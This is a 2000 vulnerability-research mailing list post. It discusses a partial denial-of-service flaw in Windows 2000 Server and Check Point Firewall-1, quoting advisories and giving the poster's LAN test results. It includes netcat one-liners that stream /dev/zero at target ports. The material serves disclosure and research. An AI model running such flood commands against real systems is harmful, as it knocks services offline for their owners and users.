Vulnerability Development mailing list archives
Win2k and /dev/zero
From: pete () S3 INTEGRALIS CO UK (Pete Philips)
Date: Mon, 3 Jul 2000 11:11:22 +0100
Anyone played with this yet?
SecureXpert Labs Advisory [SX-20000620-2] - Multiple ports/protocols partial Denial of Service in Microsoft Windows 2000 Server Summary Multiple ports and protocols on Microsoft Windows 2000 Server are susceptible to a simple network attack which raises CPU utilization on Windows 2000 Server to 100%.
My initial results (tested locally on a LAN) are: Using: % nc -u <host> 135 < /dev/zero Results: Win2k = 100% CPU for duration of attack NT4 = 55% CPU for duration NT4 + MS00-029 patch = No effect The effect of the Jolt2 patch and tcpdump output indicate that this is a fragmentation attack variation. My tests yielded multiple fragments of the form: 20780:1480@various (Frag ID:size@offset) Anyone tried the Firewall-1 variation?
SecureXpert Labs Advisory [SX-20000620-3] - Partial Denial of Service in Check Point Firewall-1 on Windows NT Sending a stream of binary zeros over the network to the SMTP port on the firewall raises the target system's load to 100% while the load on the attacker's system machine remains relatively low. This can easily be reproduced from a Linux system using netcat with an input of /dev/zero, with a command such as "nc firewall 25 < /dev/zero".
Pete. --------------------------------------------------------------- | Pete Philips \|/ | | Integralis S3 Team O | | E-mail: pete.philips () integralis co uk | | Phone: +44 118 930 6060 | | PGP Key: http://www.s3.integralis.co.uk/pgp/pete.pgp | ---------------------------------------------------------------
Current thread:
- Win2k and /dev/zero Pete Philips (Jul 03)
- Re: Win2k and /dev/zero Pete Philips (Jul 06)